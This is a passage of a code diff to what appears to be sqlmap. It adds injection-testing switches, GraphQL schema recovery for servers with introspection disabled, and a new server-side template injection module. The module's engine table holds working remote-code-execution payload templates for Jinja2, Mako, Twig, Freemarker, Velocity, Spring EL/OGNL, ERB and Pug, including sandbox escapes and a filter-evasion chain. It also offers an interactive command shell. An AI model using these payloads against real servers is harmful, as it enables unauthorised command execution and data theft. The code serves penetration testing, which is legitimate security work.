- help="Test for GraphQL injection (introspection, field/argument fuzzing, SQL/NoSQL payload families)")
-
- techniques.add_argument("--ldap", dest="ldap", action="store_true",
- help="Test for LDAP injection (filter breakout, boolean blind, auth bypass)")
-
techniques.add_argument("--time-sec", dest="timeSec", type=int,
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
@@ -451,6 +442,21 @@ def cmdLineParser(argv=None):
techniques.add_argument("--second-req", dest="secondReq",
help="Load second-order HTTP request from file")
+ techniques.add_argument("--graphql", dest="graphql", action="store_true",
+ help="Test for GraphQL injection")
+
+ techniques.add_argument("--ldap", dest="ldap", action="store_true",
+ help="Test for LDAP injection")
+
+ techniques.add_argument("--nosql", dest="nosql", action="store_true",
+ help="Test for NoSQL injection")
+
+ techniques.add_argument("--xpath", dest="xpath", action="store_true",
+ help="Test for XPath injection")
+
+ techniques.add_argument("--ssti", dest="ssti", action="store_true",
+ help="Test for server-side template injection")
+
# Fingerprint options
fingerprint = parser.add_argument_group("Fingerprint", "These options can be used to perform a back-end database management system version fingerprint")
@@ -565,6 +571,12 @@ def cmdLineParser(argv=None):
enumeration.add_argument("--sql-shell", dest="sqlShell", action="store_true",
help="Prompt for an interactive SQL shell")
+ enumeration.add_argument("--ssti-query", dest="sstiQuery",
+ help="SSTI expression to evaluate in-band on the vulnerable parameter")
+
+ enumeration.add_argument("--ssti-shell", dest="sstiShell", action="store_true",
+ help="Prompt for an interactive SSTI expression shell")
+
enumeration.add_argument("--sql-file", dest="sqlFile",
help="Execute SQL statements from given file(s)")
diff --git a/lib/techniques/graphql/inject.py b/lib/techniques/graphql/inject.py
index f56139d927..c058cd64b7 100644
--- a/lib/techniques/graphql/inject.py
+++ b/lib/techniques/graphql/inject.py
@@ -22,8 +22,10 @@
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import POST_HINT
from lib.core.settings import ERROR_PARSING_REGEXES
+from lib.core.settings import GRAPHQL_ARG_WORDLIST
from lib.core.settings import GRAPHQL_ENDPOINT_PATHS
from lib.core.settings import GRAPHQL_ERROR_REGEX
+from lib.core.settings import GRAPHQL_FIELD_WORDLIST
from lib.core.settings import GRAPHQL_INTROSPECTION_QUERY
from lib.core.settings import NOSQL_ERROR_REGEX
from lib.core.settings import UPPER_RATIO_BOUND
@@ -354,6 +356,90 @@ def _introspect(endpoint):
return None
+# --- Schema recovery via field suggestions (introspection disabled) ---------
+
+def _gqlErrors(page):
+ # GraphQL error-envelope messages as a list of strings
+ doc = _parseJSON(page)
+ if not isinstance(doc, dict):
+ return []
+ return [getUnicode(e.get("message", "")) for e in (doc.get("errors") or []) if isinstance(e, dict)]
+
+
+def _harvestSuggestions(message):
+ # Pull suggested identifiers out of a "Did you mean ..." GraphQL validation message,
+ # handling both single- and double-quoted phrasings ('a', 'b', or 'c' / "a" or "b")
+ idx = message.find("Did you mean")
+ if idx < 0:
+ return []
+ return re.findall(r"""['"]([A-Za-z_][A-Za-z0-9_]*)['"]""", message[idx:])
+
+
+def _suggestFields(endpoint, op):
+ # Recover root field names for an operation via suggestion harvesting: probe a random
+ # (guaranteed-unknown) field to collect the closest matches, then confirm/expand using a
+ # seed wordlist. A seed that does NOT come back as "Cannot query field" is itself a real field.
+ prefix = "" if op == "query" else "mutation "
+ found = set()
+ probes = [randomStr(length=10, lowercase=True)] + list(GRAPHQL_FIELD_WORDLIST)
+
+ for seed in probes:
+ page, _ = _gqlSend(endpoint, "%s{ %s }" % (prefix, seed))
+ doc = _parseJSON(page) or {}
+ for entry in (doc.get("errors") or []):
+ message = getUnicode(entry.get("message", "")) if isinstance(entry, dict) else ""
+ if "Did you mean" in message and "on type" in message:
+ found.update(_harvestSuggestions(message))
+ # a seeded name counts as a real field only if it actually resolved (appears in `data`);
+ # "no unknown-field error" alone is too weak (lenient servers accept anything)
+ data = doc.get("data")
+ if seed in GRAPHQL_FIELD_WORDLIST and isinstance(data, dict) and seed in data:
+ found.add(seed)
+
+ return sorted(found)
+
+
+def _suggestArgs(endpoint, op, field):
+ # Recover an argument name for `field` from an "Unknown argument ... Did you mean ..." message
+ prefix = "" if op == "query" else "mutation "
+ bogus = randomStr(length=10, lowercase=True)
+ page, _ = _gqlSend(endpoint, '%s{ %s(%s: 1) }' % (prefix, field, bogus))
+ found = set()
+ for message in _gqlErrors(page):
+ if "Unknown argument" in message:
+ found.update(_harvestSuggestions(message))
+ return sorted(found)
+
+
+def _introspectViaSuggestions(endpoint):
+ # Fallback schema recovery when introspection is disabled but the server still leaks field/argument
+ # names through "Did you mean" validation errors. Builds best-effort Slots: known scalar arg types
+ # are unavailable here, so we default to the 'string' strategy (the most broadly injectable) and let
+ # the per-slot injection oracle confirm which (field, argument) pairs are actually vulnerable.
+
+ probe = randomStr(length=10, lowercase=True)
+ page, _ = _gqlSend(endpoint, "{ %s }" % probe)
+ if not any("Did you mean" in m for m in _gqlErrors(page)):
+ return None
+
+ logger.info("introspection is disabled; recovering the schema from field-suggestion errors")
+
+ slots = []
+ for op, parentName in (("query", "Query"), ("mutation", "Mutation")):
+ fields = _suggestFields(endpoint, op)
+ if not fields:
+ continue
+ logger.info("recovered %d %s field(s) via suggestions: %s" % (
+ len(fields), op, ", ".join(fields)))
+ for field in fields:
+ args = _suggestArgs(endpoint, op, field) or list(GRAPHQL_ARG_WORDLIST)
+ for arg in args:
+ # returnSel="" renders as "{ __typename }" (valid on any OBJECT); strategy="string"
+ slots.append(Slot(op, parentName, field, [(arg, {}, None)],
+ arg, "string", "OBJECT", "", ""))
+ return slots or None
+
+
# --- Schema walking ---------------------------------------------------------
def _extractSlots(schema):
@@ -1087,11 +1173,11 @@ def graphqlScan():
global SENTINEL
SENTINEL = randomStr(length=10, lowercase=True)
- infoMsg = "'--graphql' is self-contained: it discovers the GraphQL endpoint, "
- infoMsg += "enumerates the schema, and injects SQL/NoSQL payloads into reachable "
- infoMsg += "argument slots. SQL enumeration switches (e.g. --banner, --dbs, "
- infoMsg += "--tables) are ignored"
- logger.info(infoMsg)
+ debugMsg = "'--graphql' is self-contained: it discovers the GraphQL endpoint, "
+ debugMsg += "enumerates the schema, and injects SQL/NoSQL payloads into reachable "
+ debugMsg += "argument slots. SQL enumeration switches (e.g. --banner, --dbs, "
+ debugMsg += "--tables) are ignored"
+ logger.debug(debugMsg)
url = conf.url.rstrip("/") if conf.url else ""
@@ -1120,19 +1206,22 @@ def graphqlScan():
# 2. Schema introspection
logger.info("introspecting the GraphQL schema")
schema = _introspect(endpoint)
- if not schema:
- logger.error("introspection failed (disabled or the endpoint rejected the query)")
- return
-
- types = schema.get("types") or []
- logger.info("introspection returned %d types" % len(types))
- # 3. Slot enumeration
- slots = _extractSlots(schema)
- if not slots:
- logger.warning("no injectable argument slots found in the schema")
- _dumpSchema(schema, endpoint)
- return
+ if schema:
+ types = schema.get("types") or []
+ logger.info("introspection returned %d types" % len(types))
+ slots = _extractSlots(schema)
+ if not slots:
+ logger.warning("no injectable argument slots found in the schema")
+ _dumpSchema(schema, endpoint)
+ return
+ else:
+ # Introspection blocked: try to recover the schema from field-suggestion errors
+ logger.warning("introspection failed (disabled or rejected); trying suggestion-based recovery")
+ slots = _introspectViaSuggestions(endpoint)
+ if not slots:
+ logger.error("could not recover the schema (introspection disabled and no field suggestions)")
+ return
querySlots = [_ for _ in slots if _.operation == "query"]
mutationSlots = [_ for _ in slots if _.operation == "mutation"]
@@ -1141,8 +1230,10 @@ def graphqlScan():
len(slots), len(querySlots), len(mutationSlots)))
# 4. Schema dump (before detection -- matches regular sqlmap table/column
- # enumeration preceding data retrieval)
- _dumpSchema(schema, endpoint)
+ # enumeration preceding data retrieval). Only when introspection succeeded; the
+ # suggestion-recovered path has no full schema document to render.
+ if schema:
+ _dumpSchema(schema, endpoint)
if mutationSlots:
names = sorted(set("%s(%s:)" % (_.fieldName, _.targetArg) for _ in mutationSlots))
diff --git a/lib/techniques/ldap/inject.py b/lib/techniques/ldap/inject.py
index 446a4ce8f3..eb1ef1f188 100644
--- a/lib/techniques/ldap/inject.py
+++ b/lib/techniques/ldap/inject.py
@@ -24,15 +24,11 @@
from lib.core.settings import LDAP_ERROR_SIGNATURES
from lib.core.settings import LDAP_FINGERPRINT_ATTRIBUTES
from lib.core.settings import LDAP_MAX_LENGTH
+from lib.core.settings import LDAP_MAX_RECORDS
from lib.core.settings import UPPER_RATIO_BOUND
from lib.request.connect import Connect as Request
from lib.utils.xrange import xrange
-try:
- from lib.core.settings import LDAP_MAX_RECORDS
-except ImportError:
- LDAP_MAX_RECORDS = 20
-
SENTINEL = randomStr(length=10, lowercase=True)
@@ -644,10 +640,10 @@ def ldapScan():
global SENTINEL
SENTINEL = randomStr(length=10, lowercase=True)
- infoMsg = "'--ldap' is self-contained: it detects LDAP injection in HTTP "
- infoMsg += "parameters and dumps reachable directory entries. SQL enumeration "
- infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
- logger.info(infoMsg)
+ debugMsg = "'--ldap' is self-contained: it detects LDAP injection in HTTP "
+ debugMsg += "parameters and dumps reachable directory entries. SQL enumeration "
+ debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
+ logger.debug(debugMsg)
if not conf.paramDict:
logger.error("no request parameters to test (use --data, GET params, or similar)")
diff --git a/lib/techniques/nosql/inject.py b/lib/techniques/nosql/inject.py
index 9d4a22daea..0b262e3182 100644
--- a/lib/techniques/nosql/inject.py
+++ b/lib/techniques/nosql/inject.py
@@ -684,10 +684,10 @@ def nosqlScan():
# NoSQL injection from an application-scoped point is confined to the back-end's single query
# (one collection/label) - it confirms and dumps what that query can reach, with no analog to the
# SQL database/table/user/banner enumeration, so those switches do not apply here
- infoMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable "
- infoMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, "
- infoMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored"
- logger.info(infoMsg)
+ debugMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable "
+ debugMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, "
+ debugMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored"
+ logger.debug(debugMsg)
tested = found = 0
diff --git a/lib/techniques/ssti/__init__.py b/lib/techniques/ssti/__init__.py
new file mode 100644
index 0000000000..bcac841631
--- /dev/null
+++ b/lib/techniques/ssti/__init__.py
@@ -0,0 +1,8 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+pass
diff --git a/lib/techniques/ssti/inject.py b/lib/techniques/ssti/inject.py
new file mode 100644
index 0000000000..93251af7e3
--- /dev/null
+++ b/lib/techniques/ssti/inject.py
@@ -0,0 +1,814 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+import difflib
+import re
+import time
+
+from collections import namedtuple
+
+from lib.core.common import beep
+from lib.core.common import randomInt
+from lib.core.common import randomStr
+from lib.core.convert import getUnicode
+from lib.core.data import conf
+from lib.core.data import logger
+from lib.core.enums import CUSTOM_LOGGING
+from lib.core.enums import PLACE
+from lib.core.settings import SSTI_ERROR_SIGNATURES
+from lib.core.settings import UPPER_RATIO_BOUND
+from lib.request.connect import Connect as Request
+
+
+SENTINEL = randomStr(length=10, lowercase=True)
+
+SSTI_PLACES = (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.CUSTOM_POST)
+
+# Each Engine entry defines detection payloads and expected behaviour for one
+# template engine. Arithmetic fields use %d placeholders filled with randomInt()
+# at probe time so a static "49" on the page cannot produce a false positive.
+# Engines are listed in detection-priority order.
+Engine = namedtuple("Engine", (
+ "name", # human-readable engine name
+ "family", # language family (python, php, java, ruby, nodejs)
+ "delimiter", # expression delimiter opening (e.g. "{{")
+ "delimiterClose", # expression delimiter closing (e.g. "}}")
+ "errorRegex", # combined engine-specific error regex (None for "no specific signature")
+ "errorProbes", # tuple of malformed payload suffixes that trigger engine errors
+ "arithmeticFmt", # arithmetic proof with two %d placeholders (e.g. "{{ %d*%d }}"), or ""
+ "arithmeticUnescapedFmt", # same with escape bypass (e.g. "{{ (%d*%d)|safe }}"), or ""
+ "booleanTrue", # boolean true payload
+ "booleanFalse", # boolean false payload
+ "trueRendered", # what true renders as (for response matching)
+ "falseRendered", # what false renders as
+ "distinguishingProbe", # cross-engine disambiguation probe (None if n/a)
+ "distinguishingResult", # expected substring from disambiguation probe
+ "expressionFmt", # format string for wrapping expressions (e.g. "{{ %s }}"), or ""
+ "rcePayloads", # tuple of (payload_template, description) with {CMD} for command, or ()
+))
+
+
+def _arithmeticPayload(fmt, a, b):
+ # Substitute the two operands into the first two %d tokens by literal replacement rather than
+ # %-formatting: some engines' delimiters contain a literal '%' (e.g. ERB '<%= ... %>'), where
+ # fmt % (a, b) raises ValueError and would silently disable arithmetic detection for them.
+ return fmt.replace("%d", str(a), 1).replace("%d", str(b), 1)
+
+
+def _expressionPayload(fmt, value):
+ # Same rationale as _arithmeticPayload(): literal %s substitution so '%'-delimited engines
+ # (notably ERB) can wrap expressions instead of crashing on fmt % value.
+ return fmt.replace("%s", value, 1)
+
+
+def _degroup(text):
+ # Strip digit-group (thousands) separators so an arithmetic result still matches when the
+ # engine formats large numbers with grouping (e.g. FreeMarker renders 234*567 as "132,678").
+ # Only separators sitting between digits are removed, so ordinary text is untouched.
+ return re.sub(u"(?<=\\d)[,\u00a0\u202f\u2009']" + u"(?=\\d)", "", getUnicode(text))
+
+
+_ENGINE_TABLE = (
+ # -- Python -------------------------------------------------------------------------------------------
+ Engine("Jinja2", "python",
+ "{{", "}}",
+ r"(?i)(?:jinja2\.exceptions\.\w+|TemplateSyntaxError|UndefinedError|TemplateNotFound|TemplateAssertionError)",
+ ("{{", "{{ }}", "{{ unknown|filter }}"),
+ "{{ %d*%d }}", "{{ (%d*%d)|safe }}",
+ "{{ True }}", "{{ False }}", "True", "False",
+ None, None, # Jinja2/Twig distinguished by trueRendered ("True"/"False" vs "1"/"")
+ "{{ %s }}",
+ # Jinja2: try multiple RCE paths in order (cycler -> config -> lipsum -> attr()-chain).
+ # The last one is dot-/underscore-free (filters + \x5f-escaped dunders), bypassing
+ # sanitisers that block '.'/'_' (the CVE-2025-23211 Tandoor technique).
+ (("{{ cycler.__init__.__globals__.os.popen('{CMD}').read() }}", "cycler.__globals__"),
+ ("{{ config.from_envvar.__globals__.__builtins__.__import__('os').popen('{CMD}').read() }}", "config.from_envvar chain"),
+ ("{{ lipsum.__globals__.os.popen('{CMD}').read() }}", "lipsum.__globals__"),
+ ("{{ cycler|attr('\\x5f\\x5finit\\x5f\\x5f')|attr('\\x5f\\x5fglobals\\x5f\\x5f')|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('os')|attr('popen')('{CMD}')|attr('read')() }}", "attr() filter chain (dot/underscore-free)"))),
+ Engine("Mako", "python",
+ "${", "}",
+ r"(?i)(?:mako\.exceptions\.\w+|mako\.runtime|CompileException|SyntaxException)",
+ ("${", "${}", "<%", "<%!"),
+ "${%d*%d}", "",
+ "${True}", "${False}", "True", "False",
+ None, None, # capital True/False uniquely identifies Mako within the ${ } family (Freemarker/Spring render lowercase true/false)
+ "${%s}",
+ # Mako: popen captures output; self.module.runtime path needs no <%import%> preamble
+ (("${self.module.runtime.util.os.popen('{CMD}').read()}", "self.module.runtime.util.os.popen"),
+ ("<%import os%>${os.popen('{CMD}').read()}", "import os + popen"))),
+ # -- PHP ----------------------------------------------------------------------------------------------
+ Engine("Twig", "php",
+ "{{", "}}",
+ r"(?i)(?:Twig[\\_]Error|Twig[\\_]Environment|syntax error, unexpected|Unknown (?:filter|function|test|tag))",
+ ("{{", "{{ }}", "{{ unknown|filter }}"),
+ "{{ %d*%d }}", "{{ (%d*%d)|raw }}",
+ "{{ true }}", "{{ false }}", "1", "",
+ # '_self' renders 'Twig_Template' (Twig 1) or '__string_template__...' (Twig 2/3);
+ # 'emplate' is the substring common to both, so the probe is version-stable
+ "{{ _self }}", "emplate",
+ "{{ %s }}",
+ # Twig: filter() chain first; then sort()/map() callbacks, which double as classic
+ # sandbox escapes when 'filter' is not on the policy allow-list (DEEP1 Phishtale)
+ (("{{ ['{CMD}']|filter('system') }}", "filter('system')"),
+ ("{{ ['{CMD}']|filter('exec') }}", "filter('exec')"),
+ ("{{ ['{CMD}']|filter('shell_exec') }}", "filter('shell_exec')"),
+ ("{{ ['{CMD}', '']|sort('system')|join }}", "sort('system') sandbox escape"),
+ ("{{ ['{CMD}']|map('system')|join }}", "map('system') sandbox escape"))),
+ # -- Java ---------------------------------------------------------------------------------------------
+ Engine("Freemarker", "java",
+ "${", "}",
+ r"(?i)(?:freemarker\.(?:core|template|extract|cache)\.\w+|ParseException|InvalidReferenceException|TemplateException)",
+ ("${", "${}", "<#if ", "<#--"),
+ "${%d*%d}", "${(%d*%d)?no_esc}",
+ # modern FreeMarker errors on a bare ${true} ("boolean_format"); ?c gives the
+ # computer-format "true"/"false" string, so the boolean oracle works on real FreeMarker
+ "${true?c}", "${false?c}", "true", "false",
+ # Freemarker '?builtin' syntax (SpEL/Thymeleaf can't parse '?upper_case' -> errors there),
+ # giving an intrinsic, non-empty discriminator from Spring within the shared '${ }' family
+ '${"sstimark"?upper_case}', "SSTIMARK",
+ "${%s}",
+ # Freemarker: classic -> indirect-assign fallback
+ (("${'freemarker.template.utility.Execute'?new()('{CMD}')}", "Execute?new"),
+ ("<#assign ex='freemarker.template.utility.Execute'?new()>${ex('{CMD}')}", "assign+new"))),
+ Engine("Velocity", "java",
+ "$", "",
+ r"(?i)(?:org\.apache\.velocity\.(?:runtime|exception)\.\w+|ParseErrorException|MethodInvocationException|ResourceNotFoundException)",
+ ("$", "#if(", "#set($x=)"),
+ "", "",
+ "#if(true) TRUE #end", "#if(false) TRUE #else FALSE #end", "TRUE", "FALSE",
+ "#* velocity *#", "",
+ "", # no generic expression wrapper
+ # Velocity: full reflection chain (pre-2.3 only; patched by CVE-2020-13936)
+ (("#set($str=$class.inspect('java.lang.String').type)\n"
+ "#set($chr=$class.inspect('java.lang.Character').type)\n"
+ "#set($ex=$class.inspect('java.lang.Runtime').type.getRuntime().exec('{CMD}'))\n"
+ "$ex.waitFor()\n"
+ "#set($out=$ex.getInputStream())\n"
+ "#foreach($i in [1..$out.available()])\n"
+ "$str.valueOf($chr.toChars($out.read()))\n"
+ "#end", "reflection chain"),)),
+ Engine("Spring EL / Thymeleaf", "java",
+ "${", "}",
+ r"(?i)(?:org\.springframework\.expression\.\w+|org\.thymeleaf\.\w+|SpelEvaluationException|TemplateProcessingException|ExpressionParsingException|ValidationFailedException)",
+ ("${", "${}", "#{", "*{"),
+ "${%d*%d}", "",
+ "${true}", "${false}", "true", "false",
+ # SpEL Java method call (Freemarker uses '?upper_case', not '.toUpperCase()' -> errors
+ # there), giving an intrinsic, non-empty discriminator from Freemarker in '${ }'
+ "${'sstimark'.toUpperCase()}", "SSTIMARK",
+ "${%s}",
+ # SpEL: read the process stdout (so output is captured, not just a Process object);
+ # then a blind exec; then the OGNL form for engines that parse OGNL instead of SpEL
+ (("${new java.io.BufferedReader(new java.io.InputStreamReader(T(java.lang.Runtime).getRuntime().exec('{CMD}').getInputStream())).readLine()}", "SpEL readLine (output)"),
+ ("${T(java.lang.Runtime).getRuntime().exec('{CMD}')}", "T(Runtime).exec (blind)"),
+ ("${(#rt=@java.lang.Runtime@getRuntime()).exec('{CMD}')}", "OGNL @Runtime@getRuntime (blind)"))),
+ # -- Ruby ---------------------------------------------------------------------------------------------
+ Engine("ERB", "ruby",
+ "<%=", "%>",
+ r"(?i)(?:erb|SyntaxError|undefined local variable|no implicit conversion|wrong number of arguments|\(erb\):\d+)",
+ ("<%=", "<%", "<%#", "<%= foo.unknown_method %>"),
+ "<%= %d*%d %>", "<%= raw %d*%d %>",
+ "<%= true %>", "<%= false %>", "true", "false",
+ "<%= defined? Rails %>", "",
+ "<%= %s %>",
+ # ERB: backtick captures output; system() returns only exit status
+ (("<%= `{CMD}` %>", "backtick"),)),
+ # -- Node.js ------------------------------------------------------------------------------------------
+ Engine("Pug/Jade", "nodejs",
+ "#{", "}",
+ r"(?i)(?:pug|jade|Cannot read propert|is not a function|TypeError|ReferenceError)",
+ ("#{", "!{", "#{ }"),
+ "#{%d*%d}", "!{%d*%d}",
+ "#{true}", "#{false}", "true", "false",
+ None, None,
+ "#{%s}",
+ (("#{global.process.mainModule.require('child_process').execSync('{CMD}')}", "execSync"),)),
+ Engine("Handlebars", "nodejs",
+ "{{", "}}",
+ r"(?i)(?:handlebars|Handlebars|Parse error on line|\{\{[\w.]+\}\})",
+ ("{{", "{{#if}}", "{{/each}}"),
+ "", "",
+ "{{#if true}}yes{{/if}}", "{{#if false}}yes{{/if}}", "yes", "",
+ None, None,
+ "", # no generic expression wrapper without registered helpers
+ ()), # RCE requires pre-registered helpers; not generically exploitable
+)
+
+
+def _ratio(first, second):
+ return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio()
+
+
+def _delim(place):
+ return (conf.cookieDel or ';') if place == PLACE.COOKIE else '&'
+
+
+def _confParameters(place):
+ try:
+ return conf.parameters.get(place, "")
+ except AttributeError:
+ return conf.parameters[place] if place in conf.parameters else ""
+
+
+def _originalValue(place, parameter):
+ for segment in _confParameters(place).split(_delim(place)):
+ name, _, value = segment.partition('=')
+ if name.strip() == parameter:
+ return value
+ return conf.paramDict.get(place, {}).get(parameter) or ""
+
+
+def _replaceSegment(place, parameter, value):
+ delimiter = _delim(place)
+ raw = _confParameters(place)
+ retVal, replaced = [], False
+
+ for part in raw.split(delimiter):
+ name, _, _ = part.partition('=')
+ if not replaced and name.strip() == parameter:
+ retVal.append("%s=%s" % (name, value))
+ replaced = True
+ else:
+ retVal.append(part)
+
+ if not replaced:
+ retVal = []
+ for name, oldValue in conf.paramDict.get(place, {}).items():
+ retVal.append("%s=%s" % (name, value if name == parameter else oldValue))
+
+ return delimiter.join(retVal)
+
+
+def _send(place, parameter, value):
+ """Issue a single HTTP request with the target parameter set to `value`.
+ Temporarily mutates conf.parameters so sqlmap's normal request machinery
+ (URL construction, cookies, headers, encodings) is fully preserved."""
+
+ if conf.delay:
+ time.sleep(conf.delay)
+
+ old_params = conf.parameters.get(place, "")
+ conf.parameters[place] = _replaceSegment(place, parameter, value)
+
+ try:
+ kwargs = {"raise404": False, "silent": True}
+ if conf.verbose >= 3:
+ logger.log(CUSTOM_LOGGING.PAYLOAD, "%s=%s" % (parameter, value))
+ page, _, _ = Request.getPage(**kwargs)
+ return page or ""
+ except Exception as ex:
+ logger.debug("SSTI probe request failed: %s" % getUnicode(ex))
+ return ""
+ finally:
+ conf.parameters[place] = old_params
+
+
+def _isError(page, engine):
+ if not engine.errorRegex:
+ return False
+ return bool(re.search(engine.errorRegex, getUnicode(page or "")))
+
+
+def _backendFromError(page):
+ page = getUnicode(page or "")
+ for name, regex in SSTI_ERROR_SIGNATURES:
+ if re.search(regex, page):
+ return name
+ return None
+
+
+def _boolean(truthy, falsy):
+ """Return the reproducible true page when true/false probes diverge.
+ Both true AND false pages must be independently reproducible."""
+
+ truePage = truthy()
+ if truePage is None:
+ return None
+
+ truePage2 = truthy()
+ if _ratio(truePage, truePage2) < UPPER_RATIO_BOUND:
+ return None
+
+ falsePage = falsy()
+ if falsePage is None:
+ return None
+
+ falsePage2 = falsy()
+ if _ratio(falsePage, falsePage2) < UPPER_RATIO_BOUND:
+ return None
+
+ if _ratio(truePage, falsePage) < UPPER_RATIO_BOUND:
+ return truePage
+
+ return None
+
+
+def _probeArithmetic(place, parameter, engine):
+ """Inject a random arithmetic expression and its control pair (different
+ operands, different result). Both results must appear for their respective
+ payloads and NOT bleed across, proving the template is executing the expression
+ rather than a static '49' appearing on the page by coincidence."""
+
+ if not engine.arithmeticFmt:
+ return False
+
+ original = _originalValue(place, parameter) or ""
+ a, b = randomInt(3), randomInt(3)
+ c = b + 1 # different operand -> different result
+
+ result1 = str(a * b)
+ result2 = str(a * c)
+
+ for fmt in (engine.arithmeticFmt, engine.arithmeticUnescapedFmt):
+ if not fmt:
+ continue
+
+ try:
+ p1 = original + _arithmeticPayload(fmt, a, b)
+ p2 = original + _arithmeticPayload(fmt, a, c)
+ except (ValueError, TypeError):
+ logger.debug("SSTI arithmetic: format failed for engine '%s' with fmt=%r" % (engine.name, fmt))
+ continue
+
+ page1 = _send(place, parameter, p1)
+ page2 = _send(place, parameter, p2)
+
+ if not page1 or not page2:
+ continue
+
+ text1 = getUnicode(page1)
+ text2 = getUnicode(page2)
+
+ # Raw payload reflection means the template did NOT execute
+ if p1 in text1 or p2 in text2:
+ continue
+
+ # Match against a digit-group-stripped copy so a grouped result (e.g. FreeMarker's
+ # "132,678") still counts; the raw-reflection check above stays on the original text.
+ norm1, norm2 = _degroup(text1), _degroup(text2)
+
+ # Each result must appear in its own response and NOT in the other
+ if result1 in norm1 and result2 not in norm1 and result2 in norm2 and result1 not in norm2:
+ return True
+
+ return False
+
+
+def _probeError(place, parameter, engine):
+ """Inject each error probe suffix and check for engine-specific error messages."""
+ if not engine.errorRegex or not engine.errorProbes:
+ return None
+
+ original = _originalValue(place, parameter) or ""
+
+ for probe in engine.errorProbes:
+ payload = original + probe
+ page = _send(place, parameter, payload)
+ if not page:
+ continue
+ if _isError(page, engine):
+ return page
+ return None
+
+
+# A divide-by-zero error is language-family specific, which separates engines that SHARE a
+# delimiter but run on different runtimes (Jinja2/Python vs Twig/PHP in '{{ }}', or Mako/Python
+# vs Freemarker/Spring/Java in '${ }'). Matching is case-SENSITIVE so Python's lowercase
+# 'division by zero' is not confused with PHP's capitalised 'Division by zero'. JS is omitted on
+# purpose: 1/0 yields Infinity there rather than an error, so it carries no family signal.
+_FAMILY_DIVZERO = (
+ ("python", re.compile(r"division by zero")),
+ ("ruby", re.compile(r"divided by 0")),
+ ("php", re.compile(r"DivisionByZeroError|Division by zero")),
+ ("java", re.compile(r"ArithmeticException|/ by zero")),
+)
+
+
+def _probeFamily(place, parameter, engine, cache):
+ """Inject a divide-by-zero inside the engine's delimiter and infer the backend language
+ family from the resulting error. Returns the family string or None. Responses are cached by
+ payload so engines that share a delimiter ('{{1/0}}' etc.) cost a single request."""
+
+ if not engine.arithmeticFmt or not engine.delimiterClose:
+ return None
+
+ payload = (_originalValue(place, parameter) or "") + engine.delimiter + "1/0" + engine.delimiterClose
+ if payload not in cache:
+ cache[payload] = _send(place, parameter, payload)
+ page = cache[payload]
+ if not page:
+ return None
+
+ text = getUnicode(page)
+ if payload in text: # raw reflection -> template did not execute it
+ return None
+ for family, regex in _FAMILY_DIVZERO:
+ if regex.search(text):
+ return family
+ return None
+
+
+def _probeDistinguishing(place, parameter, engine):
+ """Send the engine-specific fingerprint probe and verify the response.
+ For probes with a non-empty expected result, the result must appear and the
+ raw probe must NOT be reflected verbatim.
+ For empty-result (comment-style) probes, the response must stay similar to
+ baseline and the probe must NOT appear in the output."""
+
+ if not engine.distinguishingProbe:
+ return False
+
+ original = _originalValue(place, parameter) or ""
+ probe = engine.distinguishingProbe
+ page = _send(place, parameter, original + probe)
+ if page is None:
+ return False
+
+ text = getUnicode(page)
+
+ # Reject raw reflection: if the probe appears verbatim, the template didn't execute it
+ if probe in text:
+ return False
+
+ if engine.distinguishingResult:
+ return engine.distinguishingResult in text
+
+ # Empty-result (comment-style) probe: response must stay similar to baseline
+ baseline = _send(place, parameter, original)
+ return _ratio(page, baseline) >= UPPER_RATIO_BOUND
+
+
+def _detectBoolean(place, parameter, engine):
+ """Establish a boolean oracle for this engine. Returns the true template or None."""
+ original = _originalValue(place, parameter) or ""
+
+ truePayload = original + engine.booleanTrue
+ falsePayload = original + engine.booleanFalse
+
+ if engine.trueRendered:
+ truePage = _send(place, parameter, truePayload)
+ if not truePage:
+ return None
+ text = getUnicode(truePage)
+ if truePayload in text or engine.trueRendered not in text:
+ return None
+
+ # Reject reflected false payload
+ falsePage = _send(place, parameter, falsePayload)
+ if falsePage and falsePayload in getUnicode(falsePage):
+ return None
+
+ return _boolean(lambda p=truePayload: _send(place, parameter, p),
+ lambda p=falsePayload: _send(place, parameter, p))
+
+
+def _booleanUniquelyIdentifies(engine):
+ """Returns True when the engine's boolean rendering signature is unique
+ among all engines sharing the same delimiter, allowing exact naming."""
+ siblings = [e for e in _ENGINE_TABLE if e.delimiter == engine.delimiter]
+ signature = (engine.booleanTrue, engine.booleanFalse,
+ engine.trueRendered, engine.falseRendered)
+ count = sum((e.booleanTrue, e.booleanFalse,
+ e.trueRendered, e.falseRendered) == signature for e in siblings)
+ return count == 1
+
+
+def _familyUniquelyIdentifies(engine):
+ """Returns True when the engine's language family is unique among engines sharing the
+ same delimiter, so a divide-by-zero family probe is enough to name it exactly."""
+ siblings = [e for e in _ENGINE_TABLE if e.delimiter == engine.delimiter]
+ return sum(e.family == engine.family for e in siblings) == 1
+
+
+def _fingerprint(place, parameter):
+ """Identify the template engine and confirm injection. Returns (engine, evidence)
+ where evidence is a dict of detection results, or (None, None).
+
+ Scoring: arithmetic(3) + boolean(2) + error(1) + distinguishing(2) + family(1).
+ Engines sharing delimiters require error, distinguishing, unique boolean rendering, or a
+ uniquely-identifying language family to be named exactly; otherwise they are reported as
+ family/probable."""
+
+ bestEngine = None
+ bestEvidence = None
+ bestScore = 0
+ divZeroCache = {}
+
+ for engine in _ENGINE_TABLE:
+ evidence = {}
+ score = 0
+
+ # Phase 1: Arithmetic in-band proof with control pair (strongest)
+ if _probeArithmetic(place, parameter, engine):
+ evidence["arithmetic"] = True
+ score += 3
+
+ # Phase 2: Boolean oracle
